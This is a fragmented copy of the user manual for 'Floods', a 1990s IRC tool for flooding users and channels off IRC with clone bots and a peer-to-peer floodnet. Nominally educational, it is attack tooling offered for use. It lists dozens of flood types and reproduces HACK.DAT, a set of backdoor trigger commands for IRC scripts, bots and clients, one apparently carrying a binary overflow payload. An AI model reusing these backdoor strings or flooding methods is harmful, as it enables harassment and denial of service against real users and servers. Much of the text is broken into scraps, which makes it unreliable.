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od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ods Copyright 1996 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document can be replicated,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, for uses other than the promotion /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ent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Sub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net /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Copy of HA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s is a program you use to flood someone off IRC.  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backdoors as well as commands to control unlimited b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someone out.  Floods is an extremely useful tool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astating and thus should not be used often as that may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 to be K-Lined from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egal Issu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Floods is a FRE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Floods as part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magazine, internet book, CD ROM, etc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 interests in Floods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master@post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the original Floods distribution file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 is essential.  Floods and all of its related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together in the original format.  The Fl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ile may not have files added to it or removed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ne of its contents may be modified, decompiled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s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 or special damage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s is provided as an educational medium.  All uses of Flo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by the author to be for educati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 liable for any damages whatsoever including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incidental, consequential, loss of business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due to the mis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handling of this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Flo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Direct IRC connection.  No need for mIRC /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mplete control over ALL the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Bots are not pre-loaded and are only loaded when you re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ast!  The code has been optimised and re-optimised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loods will stop flooding once the victim is dead or chan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.  Great way to stop your bots are getting lagged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lood protection.  Everytime someone sends you a message or CT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, he will be ignored for one minute.  The ignroe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!*@&lt;whatever&gt; so clone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21 different floods at 3 different flood levels.  That's a w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 flo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ncludes backdoors for a lot of scripts / bots/client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ackdoors is in HACK.DAT and can be edited by YOU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ncludes a raw command processor that accepts si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loodnet / Botnet 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Floods Advisor which will give you advise on what types of fl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after asking some questions abou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ncludes 3 level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 more enhancements, refer to WHATS.NE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are Necessit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of this list, but it should not be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icrosoft Windows 3.x or Microsoft Windows 95 /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sock 1.1 API compliant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ccess to interne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ick Start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tart flooding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package which Floods came in. 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you should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should ge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SWSKCTL VBX        43,648  11-29-96 12:34p CSWSKCTL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DIZ           858  01-23-97  1:00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S   DOC        39,407  01-23-97  1:00a FLOO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LOODS   EXE       299,952  01-23-97  1:00a floo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ACK     DAT         2,491  01-18-97  1:00a HA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   NEW         4,552  01-23-97  1:00a WHAT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Those files marked with a "*" are required for the pro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ecution of the program.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lete all the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tart you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xecute FLOODS.EXE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Main Menu Commands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Menu (the thing you see immediately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, there are five menu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s            Includes commands to control the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Floods    Includes floods that are meant only to be irri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Floods   Includes floods that are meant to flood off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d or no floo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Floods    Includes floods that are meant to flood of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           Includes backdoors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ipts / bots /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Bots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        To let you configure the logg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          To let you load more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Loading    To pause the loading process.  Load more b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me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         To let you unload loaded bots, so as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or         Starts the Flood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Flooding   To stop flooding on a certain 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ll Flooding To stop flooding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erver   To let you change the server of the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Nick     To let you change the nicks of the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Command     To let you directly control a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        To let you connect to a Floods Floodnet /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three flood menus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        Floods someone wit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info      Floods someone with clientinfo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CP Kill       Floods someone with ALL the CTCP fl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C Chat        Floods someone with DCC ch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C Send GarbageFloods someone with DCC s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C Kill        Floods someone with both DCC chats and s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Floods someone with ech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         Floods someone with fing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ibut         Floods someone with halib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rican        Floods someone with the original Hurrican fl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 Text       Floods someone by sending him j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         Floods someone by sending him junk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g            Floods someone with p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g Reply      Floods someone by faking ping rep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         Floods someone with a random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             Floods someone with s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          Floods someone with sou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Floods someone with tim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t           Floods someone with tr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unami         Floods someone with a tsun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        Floods someone with userinf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   Floods someone with vers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The differece between the third floods (Light, Medium an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avy) is the interval between floods and the number of floods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nd.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flood can also be used to flood a channel.  Use put th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 of the channel instead of the name of a person to flood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nnel.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.G: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#mirc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Hacks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        Includes backdoors fo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/Bots    Includes backdoors for scripts /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Sub Menus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certain options in the Main Menu menu command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pop up.  This section describes those menus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 menus, you must click on the label of the menu (The bi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very top) in order to activate the command requeste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utton also closes the sub menu.  If you want to close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ut not to perform the command, then use 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Configuration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everything that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options determine how sensitive the logg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"Log nothing at all." will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"Log everything that is important." will only lo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 such as logging in and re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"Log everything." will log everything the bot rece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 to what the bo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Load Bots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lones to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of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"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equential n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mber of clones to load:" refers to the number of bot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or add to already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rver to use:" refers to the name or IP of the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rt of server:" refers to the port of the server you ar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 Usually, this value should be 6667, 7000, 6666, 666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65, with 6667 being the most common and 6665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ke e-mail:" refers to the e-mail address you wish to appea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you have an ident server running, t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will take the value from the id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"Real" name:" refers to the name you want others to see when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HOIS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n-sequential nicks" when checked, will mean that the bo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icks with their numbers-1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it off, bot one may have a nick like "Dav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two one like "Dav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it on, bot one may have a nick like "Dav"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"F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Unload Bots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lones to u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without inform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mber of clones to unload:" refers to the number of bots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from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5 bots on and you unload 3 then only bot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t gracefully" and "Quit without informing server"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how the bot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"Quit gracefully", the bot will first inform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quitting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"Quit without informing server", the bo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.  This will cause the bot to appear to be sti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server pings the bot, the resources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by the serv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Advisor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questions,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ll the questions truthfully and if you do not know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3 answers, put in the second smallest value. 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least 2 answers, put in the biggest valu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rom the Advisor MAY NOT be correct.  You should add in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sense.  If your flood fails, try increasing the "dosage"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t your bots off too often, try decreasing it.  If that sti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, then e-mail me and give as muc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as possible.  Of course, this would mean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flood the victim then, but then, at least you get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Change Server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?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erv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"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equential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om ? to ?" refers to the start and end of the bots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  The first "?" refers to the start bot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refers to the end b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om 1 to 3" means that clones 1, 2 and 3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nge server to:" refers to the name or IP of the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lanations of "Port of server:", "Fake e-mail:", ""Real"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"Non-sequential nicks" refer to previous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any flood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? t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ood Type:" is already set and refers to the flood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ood:" refers to the person / channel to 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lanations of "From ? to ?", refer to previous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Change Nick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?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ni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nge nick to:" refers to the nick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lanations of "From ? to ?", refer to previous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If in "From ? to ?", both the "?" are the same, then the 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ill change to a non-sequential nick.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.G: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rom 1 to 1, new nick = "David"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t 1 will change nick to "David"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Raw Command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?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 to send:" refers to the command to sen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 in the form of direct server commands, so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, you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MSG &lt;NICK / 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not advised to use this option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irect server commands.  Note that if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command, you can seperate them with a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having a number in front of a command will make th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the action for that number of time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 CANNOT be nested, so "2 2 PRIVMSG #mirc Hello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4 "Hello"s to #mirc, but will just g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bots 1 to 3 performing "2 PRIVMSG #mirc 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sequence of action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1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2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3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1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2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3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bots 1 to 3 performing "PRIVMSG #mirc Hell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MSG #mirc Hello again!" then the sequence of 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1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2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3 -&gt; PRIVMSG #mi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1 -&gt; PRIVMSG #mirc Hello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2 -&gt; PRIVMSG #mirc Hello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 3 -&gt; PRIVMSG #mirc Hell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ote: Due to the fact that some bots may be faster than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thers and that some bots may be tied down performing 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mands, the sequence may NOT be strictly followed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lanations of "From ? to ?", refer to previous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Network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/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ropdown men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nect / Disconnect" is a button that displays either "Connec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sconnect" depending whether you are connected, as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.  Use this button to disconnect o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nected" contains a list of ALL the clients / server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p list" contains a list of ALL the clients / server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with the route messages will take to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.111.111.111|666.666.666.666|222.222.222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if you want to send a message to 222.222.222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to send the message to 111.111.111.111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e message to 666.666.666.666 which will in tur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to 222.222.222.2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           Start the network cha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          Starts the network flood menu, which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a flood for everyone to fl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ti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Lists      Sorts both your list of network clients /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 IP      Finds either an IP or a hop list in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ant to find IP 111.111.111.111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11.111.111.111".  If you want to fi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to 111.111.111.111, you type "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.111.111.111". If you already know the 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want to have a look at it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666.666.666.666|111.111.111.111"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66.666.666.666 is the route.  If you want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lients whose route contain 111.111.111.11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in "path 111.111.111.111", note tha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include "111.111.111.111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If you choose Network without being the client to any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nection, then you will be asked whether you want to connect t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yone.  You need to connect to someone or have someone connect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ou before you can chat over the network or request for a network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lood.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Chat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box will list all the conversation that took plac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network message such as someone requesting for a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you want to clear the list, just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y line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box will allow you to chat.  If you just type a messag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message will reach everyone on the net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/MSG &lt;IP&gt; &lt;MESSAGE&gt;", whereby &lt;IP&gt;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one on the network and &lt;MESSAGE&gt; is the mess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, the message will only reach &lt;IP&gt;.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form others via chat before starting a network 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Flood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ropd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ood level" refers to the intensity of the flood, Light, Me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down list is used to let you select the flood t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ood:" refers to the nick to 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Hacks, you will get a men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ropd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down list is used to let you select the backdo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t number:" refers to the bot to perform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nd to:" refers to the person to receive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LL backdoors are stored in HACK.DAT, which you are edit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ourself to reflect changes or additions.  The format of HACK.D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s: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&lt;Client/Script&gt;-----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llowed by the hacks.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hacks themselves are in the format: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&lt;Name of hack&gt;:&lt;Command&gt;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&lt;Command&gt; format is similiar to the format for raw commands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re are 3 additional tags for &lt;Command&gt;.  They are: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$1 -&gt; Refers to the person to send the backdoor to.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#  -&gt; Refers to the channel to send the backdoor to.  If there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is no "#" in front, then one will be added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$? -&gt; The format of this is: $?="&lt;Message&gt;".  Whereby &lt;Message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refers to a prompt to ask for a command.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For more information, refer to the copy of HACK.DAT embedded i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this document.         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loodnet / Botnet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w a new way to flood.  It normally consists of an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other server which is permanantly on IRC.  If someon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oin the network, he dcc chats or raw connect to the eggdro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on the network decides he doesn't like the nick of a victi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a command, such as !pkill, and EVERYONE on the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net / Botnet compatibility will start flooding the victi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using conventional flood protection, Ignore after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/ CTCPs, will still get the victi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s has its own built-in Floodnet / Botnet. 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o someone, just go to the main menu and select Bot-&gt;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s will then prompt you whether you want to connec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can go to the Network sub menu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button.  If you can connected, the connect butt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connect.  Refer to "Explanations of Main Menu Comman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planations of Sub Menu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ONE difference between conventional Floodne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net and Floods' Floodnet / Botnet.  For Floods' Floodnet / Bo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A SERVER.  Everyone on the network can be a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ient.  However, you can only be the client in ONE conn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&lt;- B -&lt;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A -&lt;- B means that B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-&gt;- D -&lt;- E              connected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ample network, there is no prominent server, except may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 this example, if B decides to flood someone, B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tring to all DIRECTLY connected to himself: A, C and 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3 will send the command string to those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EXCEPT B.  This way, ALL the clients / servers ge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wo drawbacks of this system of networking is that i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s, A and C will be out of the network.  However,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s that Floods will automatically make C and D connect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drawback is that if D is desperately lagged, then w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o flood someone, E and F may not get the message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n, this way, as there is no server, no single one of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servers will get too lag due to the network.  Of course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e a FAST PERMANENT site for an eggdrop, I would gladly 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up.  Of course, other than the server, I may use the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uff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mbedded Copy of HACK.DAT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py of the HACK.DAT file contained in the Floo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&lt;&lt; Start of HACK.DAT &gt;&g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SCRIPT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 Talk:PRIVMSG # :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k Bot:PRIVMSG $1 :#ZJEHOVAH# | PRIVMSG $1  :#ZLEVITICUS# | PRIVMSG $1  :#ZEXODUS# | PRIVMSG $1  :#ZGENES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Bear Kill:PRIVMSG $1 :#DO /qu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t Kill:PRIVMSG $1 :#dcc#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olZ Flash:NOTICE $1 :TESTI###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nn:PRIVMSG $1 :#DCC SEND blah&amp;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ebBot:PRIVMSG $1 :#ooook#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Kill:PRIVMSG $1 :Hello | 3 PRIVMSG $1 :whois 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000�������������������������������������������������^3҉V#�V#�#V4#5#V4#�N��̀3�@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bot:PRIVMSG $1 :#l33t# | PRIVMSG $1 :#go l33t lam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Ice V2:PRIVMSG # :a=00220022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:PRIVMSG $1 :/kgkill /quit KGK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L:PRIVMSG # :OPME | PRIVMSG # :luni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:PRIVMSG $1 :+say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cript:PRIVMSG $1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User:NOTICE $1 :53764^B^B856324^B^B32fd563gf^Vds5rx^B^Bfdtsr5ss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ill 1:PRIVMSG $1 :note create public time to die | PRIVMSG $1 :note delline | PRIVMSG $1 :note delline 8 | PRIVMSG $1 :note create public 4 m-eye frendz | PRIVMSG $1 :note del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iaC:PRIVMSG $1 :#S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CLIENT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!IRC:PRIVMSG # :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ii(Linux reg):PRIVMSG $1 :DCC CHAT cow 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 1234 moo 1 $+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LE (Mac Client):PRIVMSG $1 :#GESTA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 3.8:JOIN #hellothere! | INVITE $1 #hellothere! | INVITE $1 #hellothere!youpieceof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 3.8 2:JOIN #^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | TOPIC #^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | INVITE $1 #^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | PART #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:PRIVMSG $1 :#action says hello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RC Kill:PRIVMSG $1 :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&lt;&lt; End of HACK.DAT &gt;&g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s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ection is devoted to announcements, interesting stuff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, questions, etc. on Floods and Floods LITE.  Feel fre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on additions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You can now get the latest copy of Floo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post1.com/~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ote that my e-mail ha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 really need a site where you can run an eggdrop, so a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ermanent Floodnet / Botnet server.  If you send m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 and works, I will upgrade you to supporter statu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quire payment, we can always come to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esting Stuff / Tips / Tri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Pros and Cons of different types of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are in the middle of the network, such a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&lt;- B -&lt;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A -&lt;- B means that B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-&gt;- D -&lt;- E              connected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s will be spread to the most people i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 This mean that if you want to flood someone,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ble to flood with you then if you are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, such as F, E, A and C.  However, you must hav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 or else all the messages passing through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others will la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 am going to introduce 3 types of networking to you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whether they have any "accepted" name and will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s we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ype is linear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&lt;- B -&lt;- C              A -&lt;- B means that B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nected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in my opinion is the WORST way to form a network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ent / server in the middle decides to disconnec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breaks up into 2.  Worst still, if C wants to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one, by the time the message reaches A, C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flooding.  This means that it's harder to floo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ine if the network consists of 10 clients / serv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wants to flood, he may already stop before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flo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type is server-based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&gt;- B -&lt;- C              A -&lt;- B means that B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connected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, B is the server.  This is a bett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ing than linear networking because if an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s, the network is still in one "piece"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computers any message has to pass thr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excluding the sender and receiver.  Howev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.  Firstly, B must be VERY fast especially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etwork, otherwise, the entire network gets la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cannot get around fast enough.  Secondly, if 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, the entire network is gone.  Not in 2 "pieces" as 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ing, but totally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type is client-based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&lt;- B -&lt;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A -&lt;- B means that B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-&gt;- D -&lt;- E              connected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y opinion, this is the best of both worlds.  It isn't a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near networking, it doesn't requir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ent / server to be super fast and it doesn't break up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 client / server quits.  However, as it is still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linear-based, it is slower than server-base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suming it takes one unit of time for a message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y one client / server to another) and it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clients / servers be reasonaly fast, betwee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-base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tly Ask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Floods, it says that I do not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should be able to get ALL the files required by Floods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page.  If you can't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indows reported that I have a "device unavailible"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copy of winsock.dll is not compatible with Floods. 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one.  Note that the copy of winsock I am using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tha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and refus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is quite a common problem.  There are 2 soluti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stall Visual Basic 4.0.  Once installed, VB4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.dll option in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the language.dll option yourself.  An easy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run setup, change the language to something el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new settings.  After that, if you wan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he old one, then run setup again and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is not guranteed to work, but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act Informa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or another you wish to contact me, here's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ick     : H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etwork  : Galaxynet / EFnet / Dalnet (In order of per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h-master@post1.com (No flames / chains / bom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the latest copy of Floods, e-mail me or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ost1.com/~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add you to my list of registered users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reason why you like Floods so much AND an enhancem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ee in the next release of Floods.  Includ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IRC nick, the IRC network(s) you visit most oft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Flood you are talking about. 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upplied, then your application may b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DO NOT have to pay (for now anyway)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s of new Floods releases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bugfix is considered an enhancement.  If you are already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user and you send me another enhancement, then you wi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upgraded to a supporter and future versions of the software w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mailed through e-mail to you.  You will also receive beta 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 the software, if you request for them.        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